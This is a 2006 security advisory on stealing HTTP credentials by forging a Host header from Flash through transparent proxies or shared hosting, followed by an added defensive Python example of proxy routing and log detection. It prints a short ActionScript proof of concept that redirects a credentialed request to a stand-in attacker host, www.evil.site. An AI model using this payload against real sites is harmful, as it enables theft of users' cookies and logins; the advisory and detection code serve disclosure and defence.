
| Subject: | Technical note: under some conditions, it's possible to steal HTTP credentials using Flash |
|---|---|
| Date: | Mon, 14 Aug 2006 20:52:45 +0200 |
Technical note: under some conditions, it's possible to steal HTTP credentials using Flash (requires IE + some transparent proxies or virtual hosting)

The method described here is pretty simple. It works though only on HTTP (not HTTPS) credentials. Also, it works only when the client browses (using IE) through certain types of transparent proxies (or the target server is virtually hosted together with an attacker site).

The idea is to force a Host request header, using Flash (this idea was presented in "Forging HTTP request headers with Flash", http://www.securityfocus.com/archive/1/441014). A victim (browser) is presented with a Flash resource (say, http://www.evil.site/attack.swf) that contains the following ActionScript code:

```actionscript
var req:LoadVars=new LoadVars();
req.addRequestHeader("Host:","www.evil.site");
req.send("http://www.target.site/some/path/","_blank");
```

The browser assumes that the request goes to http://www.target.site/some/path/, so it adds whatever credentials are relevant (non-secure cookies, including HttpOnly cookies, HTTP basic auth, etc.). But the actual request has a different Host header. The request goes to the IP address of www.target.site. However, a transparent proxy (e.g. one operated by the victim's ISP, intercepting all port 80 traffic) may disregard the original destination IP address and send the request to the IP address of www.evil.site (I noticed some popular transparent proxies do that). Even if no such proxy server exists, the attacker may acquire web presence on the same IP address as www.target.site, park the domain www.evil.site there, and when the request arrives at the web server, it will go to www.evil.site.

Note that the Host header modification in order to steal credentials was discussed in "XS(T) attack variants which can, in some cases, eliminate the need for TRACE", http://www.securityfocus.com/archive/107/308433, yet at that time it seemed that the only way to force such a header was from XmlHttpRequest, which necessitates an XSS condition (due to the "same origin" policy). With Flash, this same origin policy doesn't apply, hence no need for an XSS condition.

Recommendation:

1. Use SSL (HTTPS), and set the secure bit of the cookie accordingly.
2. Do not use virtual hosting with possibly malicious websites.
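The following is an added example and not code from the original post: it models the routing decision a transparent proxy makes for the request described above, contrasting the weak policy (forward wherever the Host header resolves) with a hardened one (forward only to the address the client actually connected to, and refuse when the Host header disagrees), and it runs a detection pass over constructed proxy log records to flag the Host/destination mismatch that such a request leaves behind. The host names, IP addresses, DNS table and log format are all assumptions made up for the example.

```python
"""Added example (not from the original post): transparent-proxy routing
policies and a log check for requests whose Host header does not match the
original destination.  All names, addresses and the log format are constructed."""
import re
from typing import List, Optional, Tuple

# Constructed table standing in for DNS resolution (hypothetical addresses).
DNS = {
    "www.target.site": "192.0.2.10",
    "www.evil.site": "203.0.113.5",
}


def resolve(host: str) -> Optional[str]:
    """Resolve a Host header value (port suffix ignored) with the constructed table."""
    return DNS.get(host.split(":", 1)[0].strip().lower())


def parse_host(raw_request: bytes) -> Optional[str]:
    """Return the first Host header of a raw HTTP/1.x request, or None if absent."""
    head = raw_request.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    for line in head.split("\r\n")[1:]:          # skip the request line
        name, _, value = line.partition(":")
        if name.strip().lower() == "host":
            return value.strip()
    return None


def route_weak(dst_ip: str, host: str) -> str:
    """Weak policy: route on the Host header alone, ignoring where the client
    connected.  This is the behaviour the note observed in some transparent
    proxies; a forged Host header silently diverts the request."""
    return resolve(host) or dst_ip


def route_hardened(dst_ip: str, host: str) -> Optional[str]:
    """Hardened policy: forward to the original destination IP only when the
    Host header resolves to it; otherwise refuse (return None, answer 400)
    rather than guess a different upstream."""
    return dst_ip if resolve(host) == dst_ip else None


# Constructed log format: "<client_ip> <original_dst_ip> <host_header> <path>".
LOG_RE = re.compile(r"^(?P<src>\S+) (?P<dst>\S+) (?P<host>\S+) (?P<path>\S+)$")


def find_host_mismatches(log_lines: List[str]) -> List[Tuple[str, str, str, str]]:
    """Flag records whose Host header does not resolve to the original
    destination IP.  A browser that built the request itself would never
    produce this combination, so each hit is worth reviewing."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue                              # malformed record, skip
        if resolve(m["host"]) != m["dst"]:
            hits.append((m["src"], m["dst"], m["host"], m["path"]))
    return hits


# Constructed sample: one ordinary request, one with a forged Host header.
SAMPLE_LOG = [
    "10.0.0.7 192.0.2.10 www.target.site /account/",
    "10.0.0.7 192.0.2.10 www.evil.site /some/path/",
]

if __name__ == "__main__":
    raw = b"GET /some/path/ HTTP/1.1\r\nHost: www.evil.site\r\n\r\n"
    host = parse_host(raw)
    print("weak policy forwards to:", route_weak("192.0.2.10", host))
    print("hardened policy forwards to:", route_hardened("192.0.2.10", host))
    for hit in find_host_mismatches(SAMPLE_LOG):
        print("mismatch:", hit)
```

The hardened policy is the proxy-side counterpart of the note's second recommendation: once the forwarding decision is pinned to the destination the client chose, a co-hosted attacker site on a different address cannot receive the request, and the only remaining case is genuine co-hosting on the same IP, which the note says to avoid. The log check gives operators of an intercepting proxy a way to notice the pattern after the fact.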